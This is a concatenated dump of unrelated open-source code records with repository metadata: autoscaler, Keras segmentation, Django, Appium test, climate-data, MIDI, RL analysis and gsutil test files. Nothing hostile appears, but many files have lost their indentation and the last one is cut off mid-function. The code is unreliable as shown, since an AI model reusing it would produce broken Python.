self._last_scale_up = None
self.worker = worker
assert self.keepalive, 'cannot scale down too fast.'
def body(self):
with self.mutex:
self.maybe_scale()
sleep(1.0)
def _maybe_scale(self, req=None):
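        # Target pool size is qty (reserved requests) clamped to [min_concurrency, max_concurrency].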
procs = self.processes
cur = min(self.qty, self.max_concurrency)
if cur > procs:
self.scale_up(cur - procs)
return True
cur = max(self.qty, self.min_concurrency)
if cur < procs:
self.scale_down(procs - cur)
return True
def maybe_scale(self, req=None):
if self._maybe_scale(req):
self.pool.maintain_pool()
def update(self, max=None, min=None):
with self.mutex:
if max is not None:
if max < self.processes:
self._shrink(self.processes - max)
self.max_concurrency = max
if min is not None:
if min > self.processes:
self._grow(min - self.processes)
self.min_concurrency = min
return self.max_concurrency, self.min_concurrency
def force_scale_up(self, n):
with self.mutex:
new = self.processes + n
if new > self.max_concurrency:
self.max_concurrency = new
self._grow(n)
def force_scale_down(self, n):
with self.mutex:
new = self.processes - n
if new < self.min_concurrency:
self.min_concurrency = max(new, 0)
self._shrink(min(n, self.processes))
def scale_up(self, n):
self._last_scale_up = monotonic()
return self._grow(n)
def scale_down(self, n):
if self._last_scale_up and (
monotonic() - self._last_scale_up > self.keepalive):
return self._shrink(n)
def _grow(self, n):
info('Scaling up %s processes.', n)
self.pool.grow(n)
self.worker.consumer._update_prefetch_count(n)
def _shrink(self, n):
info('Scaling down %s processes.', n)
try:
self.pool.shrink(n)
except ValueError:
debug("Autoscaler won't scale down: all processes busy.")
except Exception as exc:
error('Autoscaler: scale_down: %r', exc, exc_info=True)
self.worker.consumer._update_prefetch_count(-n)
def info(self):
return {
'max': self.max_concurrency,
'min': self.min_concurrency,
'current': self.processes,
'qty': self.qty,
}
@property
def qty(self):
return len(state.reserved_requests)
@property
def processes(self):
return self.pool.num_processes
|
[
"lavanya.ramkumar99@gmail.com"
] |
lavanya.ramkumar99@gmail.com
|
466965dcbb3fd44bda5de7f81e42d31ae7e715c4
|
c5a360ae82b747307b94720e79e2e614d0c9f70f
|
/step2_process_data_format_by_keras.py
|
818e00fc1f1b23a04f91efd4f4c676aa8a55aca4
|
[] |
no_license
|
gswyhq/chinese_wordseg_keras
|
cf99156773d4555acddf3163457f9bc224a16477
|
7f1de5fb1e3372fac9df75d3d839aa92fa4601c9
|
refs/heads/master
| 2020-05-02T13:49:32.099129
| 2019-03-28T14:07:46
| 2019-03-28T14:11:49
| 177,993,542
| 0
| 0
| null | 2019-03-27T12:49:37
| 2019-03-27T12:49:37
| null |
UTF-8
|
Python
| false
| false
| 4,090
|
py
|
#!/usr/bin/python3
# coding=utf-8
# ### An experiment in Chinese word segmentation with deep learning
# - Chinese word segmentation with word2vec + a neural network
# - Step 1: build initial character vectors from the Sogou corpus.
# - Step 2: read the annotated training corpus and convert it into the data format Keras expects.
# - Step 3: build a model on the training data using a CNN
# - Step 4: read the unannotated test corpus and tag the segmentation with the CNN model
# - Step 5: inspect the final results
# - References: [Chinese word segmentation resources](http://www.52nlp.cn/%E4%B8%AD%E6%96%87%E5%88%86%E8%AF%8D%E5%85%A5%E9%97%A8%E4%B9%8B%E8%B5%84%E6%BA%90)
# [Character-based tagging for Chinese segmentation](http://www.52nlp.cn/the-character-based-tagging-method-of-chinese-word-segmentation) [The math behind word2vec](http://suanfazu.com/t/word2vec-zhong-de-shu-xue-yuan-li-xiang-jie-duo-tu-wifixia-yue-du/178) [word2vec-based Chinese segmentation](http://blog.csdn.net/itplus/article/details/17122431)
# - Step 1: generate Chinese single-character vectors from the Sogou corpus for later use
import codecs
import numpy as np
from pickle import dump,load
# - Step 2: read and convert the training data
init_weight_wv= load(open('init_weight.pickle','rb'))
word2idx = load(open('word2idx.pickle', 'rb'))
idx2word = load(open('idx2word.pickle', 'rb'))
# Read the data and convert it to the four-tag format: S B M E
input_file = './data/icwb2-data/training/msr_training.utf8'
output_file = './data/icwb2-data/training/msr_training.tagging.utf8'
# The four character tags: B (begin), E (end), M (middle), S (single)
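# e.g. the line "研究 生命" is tagged as "研/B 究/E 生/B 命/E "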
def character_tagging(input_file, output_file):
input_data = codecs.open(input_file, 'r', 'utf-8')
output_data = codecs.open(output_file, 'w', 'utf-8')
for line in input_data.readlines():
word_list = line.strip().split()
for word in word_list:
if len(word) == 1:
output_data.write(word + "/S ")
else:
output_data.write(word[0] + "/B ")
for w in word[1:len(word)-1]:
output_data.write(w + "/M ")
output_data.write(word[len(word)-1] + "/E ")
output_data.write("\n")
input_data.close()
output_data.close()
character_tagging(input_file, output_file)
# Define 'U' for unseen (out-of-vocabulary) characters and a space character for padding at both ends, and append a vector for each
char_num = len(init_weight_wv)
idx2word[char_num] = u'U'
word2idx[u'U'] = char_num
idx2word[char_num+1] = u' '
word2idx[u' '] = char_num+1
init_weight_wv.append(np.random.randn(100,))
init_weight_wv.append(np.zeros(100,))
# Separate characters and labels
with open(output_file) as f:
lines = f.readlines()
train_line = [[w[0] for w in line.split()] for line in lines]
train_label = [w[2] for line in lines for w in line.split()]
# Convert a document to lists of character indices
def sent2num(sentence, word2idx=word2idx, context=7):
    predict_word_num = []
    for w in sentence:
        # Map each character to its index; out-of-vocabulary characters map to 'U'
        if w in word2idx:
            predict_word_num.append(word2idx[w])
        else:
            predict_word_num.append(word2idx[u'U'])
    # Pad both ends
    num = len(predict_word_num)
    pad = int((context-1)*0.5)
    for i in range(pad):
        predict_word_num.insert(0, word2idx[u' '])
        predict_word_num.append(word2idx[u' '])
    train_x = []
    for i in range(num):
        train_x.append(predict_word_num[i:i+context])
    return train_x
# Input: a list of characters; output: a list of index windows
sent2num(train_line[0])
# Convert all the training text into index lists
train_word_num = []
for line in train_line:
train_word_num.extend(sent2num(line))
print(len(train_word_num))
print(len(train_label))
dump(train_word_num, open('train_word_num.pickle', 'wb'))
#train_word_num = load(open('train_word_num.pickle','rb'))
dump(train_label, open('train_label.pickle', 'wb'))
dump(sent2num, open('sent2num.pickle', 'wb'))
def main():
pass
if __name__ == '__main__':
main()
|
[
"gswyhq@126.com"
] |
gswyhq@126.com
|
d1ce2f47b5065975e22b593396c700d64efe1e9f
|
8a3e2d3aa46224bb0fa8ff2351f3a0bb339b0abd
|
/my_site/campaign/forms.py
|
3f7e74dbce84eaa30d8118c3816d03edc36af25e
|
[] |
no_license
|
Mosaab4/Task
|
85ceeab56b3ffe57049d3474c97964d51ace3471
|
4d0d250c06e97a74ce723e91addc9c17faef5b4e
|
refs/heads/master
| 2020-03-23T15:33:53.417503
| 2018-07-20T21:37:14
| 2018-07-20T21:37:14
| 141,757,012
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 512
|
py
|
from django import forms
from django.forms import SelectDateWidget
from .models import Campaign
class CampaignForm(forms.ModelForm):
stop_date = forms.DateField(
widget=forms.DateInput(
attrs={
'type': 'date',
'class': 'form-control'
}
)
)
class Meta:
model = Campaign
fields = (
'name',
'status',
'type',
'stop_date',
'description',
)
|
[
"musab.ehab@gmail.com"
] |
musab.ehab@gmail.com
|
b8f92479cf86e0f5872b64f2bc3d32b9b1e0f0a4
|
32eeb97dff5b1bf18cf5be2926b70bb322e5c1bd
|
/benchmark/radiocell/testcase/allpreferencecases/precase_log.py
|
5de436ca260389960142a69aa2c35fe93a6bb02c
|
[] |
no_license
|
Prefest2018/Prefest
|
c374d0441d714fb90fca40226fe2875b41cf37fc
|
ac236987512889e822ea6686c5d2e5b66b295648
|
refs/heads/master
| 2021-12-09T19:36:24.554864
| 2021-12-06T12:46:14
| 2021-12-06T12:46:14
| 173,225,161
| 5
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,780
|
py
|
#coding=utf-8
import os
import subprocess
import time
import traceback
from appium import webdriver
from appium.webdriver.common.touch_action import TouchAction
from selenium.common.exceptions import NoSuchElementException, WebDriverException
desired_caps = {
'platformName' : 'Android',
'deviceName' : 'Android Emulator',
'platformVersion' : '4.4',
'appPackage' : 'org.openbmap',
'appActivity' : 'org.openbmap.activities.StartscreenActivity',
'resetKeyboard' : True,
'androidCoverage' : 'org.openbmap/org.openbmap.JacocoInstrumentation',
'noReset' : True
}
def command(cmd, timeout=5):
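    # Launch a shell command, give it timeout seconds to run, then terminate it.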
p = subprocess.Popen(cmd, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True)
time.sleep(timeout)
p.terminate()
return
def getElememt(driver, str) :
for i in range(0, 5, 1):
try:
element = driver.find_element_by_android_uiautomator(str)
except NoSuchElementException:
time.sleep(1)
else:
return element
os.popen("adb shell input tap 50 50")
element = driver.find_element_by_android_uiautomator(str)
return element
def getElememtBack(driver, str1, str2) :
for i in range(0, 2, 1):
try:
element = driver.find_element_by_android_uiautomator(str1)
except NoSuchElementException:
time.sleep(1)
else:
return element
for i in range(0, 5, 1):
try:
element = driver.find_element_by_android_uiautomator(str2)
except NoSuchElementException:
time.sleep(1)
else:
return element
os.popen("adb shell input tap 50 50")
element = driver.find_element_by_android_uiautomator(str2)
return element
def swipe(driver, startxper, startyper, endxper, endyper) :
size = driver.get_window_size()
width = size["width"]
height = size["height"]
try:
driver.swipe(start_x=int(width * startxper), start_y=int(height * startyper), end_x=int(width * endxper),
end_y=int(height * endyper), duration=1000)
except WebDriverException:
time.sleep(1)
driver.swipe(start_x=int(width * startxper), start_y=int(height * startyper), end_x=int(width * endxper),
end_y=int(height * endyper), duration=1000)
return
def scrollToFindElement(driver, str) :
for i in range(0, 5, 1):
try:
element = driver.find_element_by_android_uiautomator(str)
elements = driver.find_elements_by_android_uiautomator(str)
if (len(elements) > 1) :
for temp in elements :
if temp.get_attribute("enabled") == "true" :
element = temp
break
except NoSuchElementException:
swipe(driver, 0.5, 0.55, 0.5, 0.2)
else :
return element
for i in range(0, 4, 1):
try:
element = driver.find_element_by_android_uiautomator(str)
elements = driver.find_elements_by_android_uiautomator(str)
if (len(elements) > 1):
for temp in elements:
if temp.get_attribute("enabled") == "true":
element = temp
break
except NoSuchElementException:
swipe(driver, 0.5, 0.2, 0.5, 0.55)
else :
return element
return
def scrollToClickElement(driver, str) :
element = scrollToFindElement(driver, str)
if element is None :
return
else :
element.click()
def clickInList(driver, str) :
element = None
if (str is None) :
candidates = driver.find_elements_by_class_name("android.widget.CheckedTextView")
if len(candidates) >= 1 and checkWindow(driver):
element = candidates[len(candidates)-1]
else :
element = scrollToFindElement(driver, str)
if element is not None :
element.click()
else :
if checkWindow(driver) :
driver.press_keycode(4)
def clickOnCheckable(driver, str, value = "true") :
parents = driver.find_elements_by_class_name("android.widget.LinearLayout")
for parent in parents:
try :
parent.find_element_by_android_uiautomator(str)
lists = parent.find_elements_by_class_name("android.widget.LinearLayout")
if len(lists) == 1 :
innere = parent.find_element_by_android_uiautomator("new UiSelector().checkable(true)")
nowvalue = innere.get_attribute("checked")
if (nowvalue != value) :
innere.click()
break
except NoSuchElementException:
continue
def typeText(driver, value) :
element = getElememt(driver, "new UiSelector().className(\"android.widget.EditText\")")
element.clear()
element.send_keys(value)
enterelement = getElememt(driver, "new UiSelector().text(\"OK\")")
if (enterelement is None) :
if checkWindow(driver):
driver.press_keycode(4)
else :
enterelement.click()
def checkWindow(driver) :
dsize = driver.get_window_size()
nsize = driver.find_element_by_class_name("android.widget.FrameLayout").size
if dsize['height'] > nsize['height']:
return True
else :
return False
def conscript(driver):
try:
driver.find_element_by_android_uiautomator("new UiSelector().text(\"OK\")").click()
time.sleep(0.1)
except NoSuchElementException:
time.sleep(0.1)
return
# preference setting and exit
try :
starttime = time.time()
driver = webdriver.Remote('http://localhost:4723/wd/hub', desired_caps)
os.popen("adb shell am start -n org.openbmap/org.openbmap.activities.AdvancedSettingsActivity -a test")
scrollToClickElement(driver, "new UiSelector().text(\"Ignore low battery\")")
conscript(driver)
clickOnCheckable(driver, "new UiSelector().text(\"Ignore low battery\")", "true")
scrollToClickElement(driver, "new UiSelector().text(\"Cleanup old sessions\")")
conscript(driver)
clickOnCheckable(driver, "new UiSelector().text(\"Cleanup old sessions\")", "true")
scrollToClickElement(driver, "new UiSelector().text(\"On export, create a GPX file locally on your device\")")
conscript(driver)
clickOnCheckable(driver, "new UiSelector().text(\"On export, create a GPX file locally on your device\")", "true")
scrollToClickElement(driver, "new UiSelector().text(\"GPX verbosity\")")
clickInList(driver, "new UiSelector().text(\"Waypoints only\")")
conscript(driver)
scrollToClickElement(driver, "new UiSelector().text(\"Wireless scan mode\")")
clickInList(driver, "new UiSelector().text(\"Full power mode\")")
conscript(driver)
scrollToClickElement(driver, "new UiSelector().text(\"Anonymise SSID in upload files\")")
conscript(driver)
clickOnCheckable(driver, "new UiSelector().text(\"Anonymise SSID in upload files\")", "true")
scrollToClickElement(driver, "new UiSelector().text(\"Skip upload\")")
conscript(driver)
clickOnCheckable(driver, "new UiSelector().text(\"Skip upload\")", "true")
scrollToClickElement(driver, "new UiSelector().text(\"Keep uploaded files\")")
conscript(driver)
clickOnCheckable(driver, "new UiSelector().text(\"Keep uploaded files\")", "true")
driver.press_keycode(4)
time.sleep(2)
os.popen("adb shell am start -n org.openbmap/org.openbmap.activities.SettingsActivity -a test")
scrollToClickElement(driver, "new UiSelector().text(\"Anonymous upload\")")
conscript(driver)
clickOnCheckable(driver, "new UiSelector().text(\"Anonymous upload\")", "true")
scrollToClickElement(driver, "new UiSelector().text(\"Save Cells\")")
conscript(driver)
clickOnCheckable(driver, "new UiSelector().text(\"Save Cells\")", "false")
scrollToClickElement(driver, "new UiSelector().text(\"Save WiFis\")")
conscript(driver)
clickOnCheckable(driver, "new UiSelector().text(\"Save WiFis\")", "false")
scrollToClickElement(driver, "new UiSelector().text(\"Keep screen on\")")
conscript(driver)
clickOnCheckable(driver, "new UiSelector().text(\"Keep screen on\")", "false")
driver.press_keycode(4)
time.sleep(2)
except Exception, e:
print 'FAIL'
print 'str(e):\t\t', str(e)
print 'repr(e):\t', repr(e)
print traceback.format_exc()
else:
print 'OK'
finally:
cpackage = driver.current_package
endtime = time.time()
print 'consumed time:', str(endtime - starttime), 's'
command("adb shell am broadcast -a com.example.pkg.END_EMMA --es name \"preference_pre\"")
jacocotime = time.time()
print 'jacoco time:', str(jacocotime - endtime), 's'
driver.quit()
|
[
"prefest2018@gmail.com"
] |
prefest2018@gmail.com
|
d600b8b2c4530936de8246363f50622650126ebf
|
facb8b9155a569b09ba66aefc22564a5bf9cd319
|
/wp2/era5_scripts/02_preprocessing/concat82/62-tideGauge.py
|
f2b56a3028ad9bd3ebd829ae2f793963efbc05f3
|
[] |
no_license
|
moinabyssinia/modeling-global-storm-surges
|
13e69faa8f45a1244a964c5de4e2a5a6c95b2128
|
6e385b2a5f0867df8ceabd155e17ba876779c1bd
|
refs/heads/master
| 2023-06-09T00:40:39.319465
| 2021-06-25T21:00:44
| 2021-06-25T21:00:44
| 229,080,191
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,480
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Tue May 13 10:02:00 2020
---------------------------------------------------------
This script concatenates yearly predictor files
Browses the predictor folders for the chosen TG
Concatenates the yearly csvs for the chosen predictor
Saves the concatenated csv in a separate directory
---------------------------------------------------------
@author: Michael Tadesse
"""
#%% import packages
import os
import pandas as pd
#%% define directories
home = '/lustre/fs0/home/mtadesse/erafive_localized'
out_path = '/lustre/fs0/home/mtadesse/eraFiveConcat'
#cd to the home dir to get TG information
os.chdir(home)
tg_list = os.listdir()
x = 62
y = 63
#looping through TGs
for t in range(x, y):
tg = tg_list[t]
print(tg)
#concatenate folder paths
os.chdir(os.path.join(home, tg))
#defining the folders for predictors
#choose only u, v, and slp
where = os.getcwd()
csv_path = {'slp' : os.path.join(where, 'slp'),\
"wnd_u": os.path.join(where, 'wnd_u'),\
'wnd_v' : os.path.join(where, 'wnd_v')}
#%%looping through predictors
for pred in csv_path.keys():
os.chdir(os.path.join(home, tg))
# print(tg, ' ', pred, '\n')
#cd to the chosen predictor
os.chdir(pred)
#%%looping through the yearly csv files
count = 1
for yr in os.listdir():
print(pred, ' ', yr)
if count == 1:
dat = pd.read_csv(yr)
# print('original size is: {}'.format(dat.shape))
else:
#remove the header of the subsequent csvs before merging
# dat_yr = pd.read_csv(yr, header=None).iloc[1:,:]
dat_yr = pd.read_csv(yr)
dat_yr.shape
dat = pd.concat([dat, dat_yr], axis = 0)
# print('concatenated size is: {}'.format(dat.shape))
count+=1
print(dat.shape)
#saving concatenated predictor
#cd to the saving location
os.chdir(out_path)
#create/cd to the tg folder
try:
os.makedirs(tg)
os.chdir(tg) #cd to it after creating it
except FileExistsError:
#directory already exists
os.chdir(tg)
#save as csv
pred_name = '.'.join([pred, 'csv'])
dat.to_csv(pred_name)
|
[
"michaelg.tadesse@gmail.com"
] |
michaelg.tadesse@gmail.com
|
f8df77cd858240028f56eee704517225c5904b92
|
94a69d05880fdb03ad915a63f3575ff01e5df0e6
|
/isobar/io/midi/output.py
|
fbe793950ad0b3554dc0d03d9073936ce9a6c46e
|
[
"MIT"
] |
permissive
|
ideoforms/isobar
|
06f2a5553b33e8185c6f9aed06224811589f7b70
|
12b03500ea882f17c3521700f7f74b0e36e4b335
|
refs/heads/master
| 2023-07-20T20:31:13.040686
| 2023-07-17T19:19:01
| 2023-07-17T19:19:01
| 2,155,202
| 320
| 53
|
MIT
| 2023-05-01T21:29:46
| 2011-08-04T15:12:03
|
Python
|
UTF-8
|
Python
| false
| false
| 3,799
|
py
|
import os
import mido
import logging
from ..output import OutputDevice
from ...exceptions import DeviceNotFoundException
from ...constants import MIDI_CLOCK_TICKS_PER_BEAT
log = logging.getLogger(__name__)
class MidiOutputDevice (OutputDevice):
def __init__(self, device_name=None, send_clock=False, virtual=False):
"""
Create a MIDI output device.
Use `isobar.get_midi_output_names()` to query all available devices.
Args:
device_name (str): The name of the target device to use.
The default MIDI output device name can also be specified
with the environmental variable ISOBAR_DEFAULT_MIDI_OUT.
send_clock (bool): Whether to send clock sync/reset messages.
virtual (bool): Whether to create a "virtual" rtmidi device.
"""
try:
if device_name is None:
device_name = os.getenv("ISOBAR_DEFAULT_MIDI_OUT")
self.midi = mido.open_output(device_name, virtual=virtual)
except (RuntimeError, SystemError, OSError):
raise DeviceNotFoundException("Could not find MIDI device")
self.send_clock = send_clock
log.info("Opened MIDI output: %s" % self.midi.name)
def start(self):
"""
Sends a MIDI start message to the output device.
"""
if self.send_clock:
msg = mido.Message("start")
self.midi.send(msg)
def stop(self):
"""
Sends a MIDI stop message to the output device.
"""
if self.send_clock:
msg = mido.Message("stop")
self.midi.send(msg)
@property
def ticks_per_beat(self):
"""
        The number of clock ticks per beat.
        For MIDI devices this is fixed at the MIDI standard of 24.
"""
return MIDI_CLOCK_TICKS_PER_BEAT
def tick(self):
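        # Emit one MIDI clock pulse; callers are expected to tick ticks_per_beat (24) times per beat.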
if self.send_clock:
msg = mido.Message("clock")
self.midi.send(msg)
def note_on(self, note=60, velocity=64, channel=0):
log.debug("[midi] Note on (channel = %d, note = %d, velocity = %d)" % (channel, note, velocity))
msg = mido.Message('note_on', note=int(note), velocity=int(velocity), channel=int(channel))
self.midi.send(msg)
def note_off(self, note=60, channel=0):
log.debug("[midi] Note off (channel = %d, note = %d)" % (channel, note))
msg = mido.Message('note_off', note=int(note), channel=int(channel))
self.midi.send(msg)
def all_notes_off(self):
log.debug("[midi] All notes off")
for channel in range(16):
for note in range(128):
msg = mido.Message('note_off', note=int(note), channel=int(channel))
self.midi.send(msg)
def control(self, control=0, value=0, channel=0):
log.debug("[midi] Control (channel %d, control %d, value %d)" % (channel, control, value))
msg = mido.Message('control_change', control=int(control), value=int(value), channel=int(channel))
self.midi.send(msg)
def program_change(self, program=0, channel=0):
log.debug("[midi] Program change (channel %d, program_change %d)" % (channel, program))
msg = mido.Message('program_change', program=int(program), channel=int(channel))
self.midi.send(msg)
def pitch_bend(self, pitch=0, channel=0):
log.debug("[midi] Pitch bend (channel %d, pitch %d)" % (channel, pitch))
msg = mido.Message('pitchwheel', pitch=int(pitch), channel=int(channel))
self.midi.send(msg)
def set_song_pos(self, pos=0):
msg = mido.Message('songpos', pos=pos)
self.midi.send(msg)
def __del__(self):
if hasattr(self, "midi"):
del self.midi
|
[
"daniel@jones.org.uk"
] |
daniel@jones.org.uk
|
7120668501fd24173b3eeac50a49ced2c1bd7cea
|
39fbf1f554651f089dbf8478f009e38a2cbb7c25
|
/RL/analyze.random-search.py
|
282c8597a966b866b1b837a297a921ce6bfac83d
|
[
"Apache-2.0"
] |
permissive
|
Libardo1/icnn
|
20b323aed5a3975c8083fb8f6234305f8cd275d1
|
2056ca88d0b0dac4d8ee1a48a8b8a9f676bafd4f
|
refs/heads/master
| 2021-01-20T15:23:06.016978
| 2016-08-01T19:35:32
| 2016-08-01T19:35:32
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,154
|
py
|
#!/usr/bin/env python3
import argparse
import os
import sys
import shutil
from subprocess import Popen, PIPE
import json
import operator
import numpy as np
import numpy.random as npr
pythonCmd = 'python3'
rlDir = os.path.dirname(os.path.realpath(__file__))
plotSrc = os.path.join(rlDir, 'plot-all.py')
mainSrc = os.path.join(rlDir, 'src', 'main.py')
all_algs = ['DDPG', 'NAF', 'ICNN']
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--expDir', type=str, default='output.random-search')
args = parser.parse_args()
bestParams, bestVals = {}, {}
for task in os.listdir(args.expDir):
taskDir = os.path.join(args.expDir, task)
if os.path.isdir(taskDir):
bestParams[task], bestVals[task] = analyzeTask(taskDir)
orgTableP = os.path.join(args.expDir, 'table.org')
with open(orgTableP, 'w') as f:
f.write('| Task | DDPG | NAF | ICNN |\n')
f.write('|------+------+-----+------|\n')
for task, algs in sorted(bestVals.items()):
bestAlg = sorted(algs.items(), key=operator.itemgetter(1),
reverse=True)[0][0]
def getStr(alg):
s = '{:.2f} ({:.2f})'.format(algs[alg][0], int(algs[alg][1]))
if alg == bestAlg:
s = '*{}*'.format(s)
return s
f.write('| {:s} | {} | {} | {} |\n'.format(
task, getStr('DDPG'), getStr('NAF'), getStr('ICNN')))
f.flush()
print('Created {}'.format(orgTableP))
texTableP = os.path.join(args.expDir, 'table.tex')
os.system('pandoc {} --to latex --output {}'.format(orgTableP, texTableP))
for task, algs in bestParams.items():
for alg, params in algs.items():
del params['copy']
del params['env']
del params['force']
del params['gdb']
del params['gymseed']
del params['model']
del params['monitor']
del params['npseed']
del params['outdir']
del params['summary']
del params['tfseed']
del params['thread']
bestParamsP = os.path.join(args.expDir, 'bestParams.json')
with open(bestParamsP, 'w') as f:
json.dump(bestParams, f, indent=2, sort_keys=True)
print('Created {}'.format(bestParamsP))
def analyzeTask(taskDir):
bestParams = {}
bestVals = {}
print('=== {}'.format(taskDir))
with open(os.path.join(taskDir, 'analysis.txt'), 'w') as f:
for alg in all_algs:
algDir = os.path.join(taskDir, alg)
if os.path.exists(algDir):
f.write('\n=== {}\n\n'.format(alg))
exps = {}
for exp in sorted(os.listdir(algDir)):
expDir = os.path.join(algDir, exp)
testData = np.loadtxt(os.path.join(expDir, 'test.log'))
testRew = testData[:,1]
N = 10
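                    # N-point rolling mean of the test reward; runs with NaNs or too few points are skipped below.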
if np.any(np.isnan(testRew)) or testRew.size <= N:
continue
testRew_ = np.array([sum(testRew[i-N:i])/N for
i in range(N, len(testRew))])
exps[exp] = [testRew_[-1], testRew_.sum()]
f.write((' + Experiment {}: Final rolling reward of {} '+
'with a cumulative reward of {}\n').format(
*([exp] + exps[exp])))
s = sorted(exps.items(), key=operator.itemgetter(1), reverse=True)
best = s[0]
bestExp = best[0]
f.write('\n--- Best of {} obtained in experiment {}\n'.format(
best[1], bestExp))
flagsP = os.path.join(algDir, bestExp, 'flags.json')
with open(flagsP, 'r') as flagsF:
f.write(flagsF.read()+'\n')
flagsF.seek(0)
flags = json.load(flagsF)
bestParams[alg] = flags
bestVals[alg] = best[1]
return bestParams, bestVals
if __name__=='__main__':
main()
|
[
"bamos@cs.cmu.edu"
] |
bamos@cs.cmu.edu
|
1e12863ed3a72096532a03ece32b12e9211e3a96
|
a59d55ecf9054d0750168d3ca9cc62a0f2b28b95
|
/platform/gsutil/gslib/tests/test_perfdiag.py
|
154b60919fd93d78dc4900e94ebc93c1dbbbc19d
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
bopopescu/google-cloud-sdk
|
bb2746ff020c87271398196f21a646d9d8689348
|
b34e6a18f1e89673508166acce816111c3421e4b
|
refs/heads/master
| 2022-11-26T07:33:32.877033
| 2014-06-29T20:43:23
| 2014-06-29T20:43:23
| 282,306,367
| 0
| 0
|
NOASSERTION
| 2020-07-24T20:04:47
| 2020-07-24T20:04:46
| null |
UTF-8
|
Python
| false
| false
| 4,129
|
py
|
# Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Integration tests for perfdiag command."""
import socket
import gslib.tests.testcase as testcase
from gslib.tests.util import ObjectToURI as suri
from gslib.tests.util import unittest
from gslib.util import IS_WINDOWS
class TestPerfDiag(testcase.GsUtilIntegrationTestCase):
"""Integration tests for perfdiag command."""
# We want to test that perfdiag works both when connecting to the standard gs
# endpoint, and when connecting to a specific IP or host while setting the
# host header. For the 2nd case we resolve storage.googleapis.com to a
# specific IP and connect to that explicitly.
_gs_ip = socket.gethostbyname('storage.googleapis.com')
_custom_endpoint_flags = [
'-o', 'Credentials:gs_host=' + _gs_ip,
'-o', 'Credentials:gs_host_header=storage.googleapis.com',
# TODO: gsutil-beta: Add host header support for JSON
'-o', 'Boto:https_validate_certificates=False']
def test_latency(self):
bucket_uri = self.CreateBucket()
cmd = ['perfdiag', '-n', '1', '-t', 'lat', suri(bucket_uri)]
self.RunGsUtil(cmd)
if self.test_api == 'XML':
self.RunGsUtil(self._custom_endpoint_flags + cmd)
def _run_basic_wthru_or_rthru(self, test_name, num_processes, num_threads):
bucket_uri = self.CreateBucket()
cmd = ['perfdiag', '-n', str(num_processes * num_threads),
'-s', '1024', '-c', str(num_processes),
'-k', str(num_threads), '-t', test_name, suri(bucket_uri)]
self.RunGsUtil(cmd)
if self.test_api == 'XML':
self.RunGsUtil(self._custom_endpoint_flags + cmd)
def test_write_throughput_single_process_multi_thread(self):
self._run_basic_wthru_or_rthru('wthru', 1, 2)
@unittest.skipIf(IS_WINDOWS, 'Multiprocessing is not supported on Windows')
def test_write_throughput_multi_process_single_thread(self):
self._run_basic_wthru_or_rthru('wthru', 2, 1)
@unittest.skipIf(IS_WINDOWS, 'Multiprocessing is not supported on Windows')
def test_write_throughput_multi_process_multi_thread(self):
self._run_basic_wthru_or_rthru('wthru', 2, 2)
def test_read_throughput_single_process_multi_thread(self):
self._run_basic_wthru_or_rthru('rthru', 1, 2)
@unittest.skipIf(IS_WINDOWS, 'Multiprocessing is not supported on Windows')
def test_read_throughput_multi_process_single_thread(self):
self._run_basic_wthru_or_rthru('rthru', 2, 1)
@unittest.skipIf(IS_WINDOWS, 'Multiprocessing is not supported on Windows')
def test_read_throughput_multi_process_multi_thread(self):
self._run_basic_wthru_or_rthru('rthru', 2, 2)
def test_input_output(self):
outpath = self.CreateTempFile()
bucket_uri = self.CreateBucket()
self.RunGsUtil(['perfdiag', '-o', outpath, '-n', '1', '-t', 'lat',
suri(bucket_uri)])
self.RunGsUtil(['perfdiag', '-i', outpath])
def test_invalid_size(self):
stderr = self.RunGsUtil(
['perfdiag', '-n', '1', '-s', 'foo', '-t', 'wthru', 'gs://foobar'],
expected_status=1, return_stderr=True)
self.assertIn('Invalid -s', stderr)
def test_toobig_size(self):
stderr = self.RunGsUtil(
['perfdiag', '-n', '1', '-s', '3pb', '-t', 'wthru', 'gs://foobar'],
expected_status=1, return_stderr=True)
self.assertIn('Maximum throughput file size', stderr)
def test_listing(self):
bucket_uri = self.CreateBucket()
stdout = self.RunGsUtil(
['perfdiag', '-n', '1', '-t', 'list', suri(bucket_uri)],
return_stdout=True)
self.assertIn('Number of listing calls made:', stdout)
|
[
"alfred.wechselberger@technologyhatchery.com"
] |
alfred.wechselberger@technologyhatchery.com
|
8e4474d37dbadeacda29af5e1b54ffe20ecd50a6
|
9789aaa94e4a321fed2a1f624ef180d938f1fe56
|
/src/common/appenginepatch/ragendja/sites/dynamicsite.py
|
6726a46f3ba6519e5807b3b081d1ea305ce0e818
|
[
"MIT",
"Apache-2.0"
] |
permissive
|
fantascy/snsanalytics
|
61ff6b8f384f0bd4be8f89a2a19101ad2cf1bc77
|
927f186c7f5a1d534e0ff7ce7aff46a0c1a36c51
|
refs/heads/master
| 2021-01-13T14:18:05.684839
| 2016-11-06T07:43:35
| 2016-11-06T07:43:35
| 72,827,547
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,871
|
py
|
from django.conf import settings
from django.core.cache import cache
from django.contrib.sites.models import Site
from ragendja.dbutils import db_create
from ragendja.pyutils import make_tls_property
_default_site_id = getattr(settings, 'SITE_ID', None)
SITE_ID = settings.__class__.SITE_ID = make_tls_property()
class DynamicSiteIDMiddleware(object):
"""Sets settings.SIDE_ID based on request's domain"""
def process_request(self, request):
# Ignore port if it's 80 or 443
if ':' in request.get_host():
domain, port = request.get_host().split(':')
try:
if int(port) not in (80, 443):
domain = request.get_host()
            except ValueError:
pass
else:
domain = request.get_host().split(':')[0]
# We cache the SITE_ID
cache_key = 'Site:domain:%s' % domain
site = cache.get(cache_key)
if site:
SITE_ID.value = site
else:
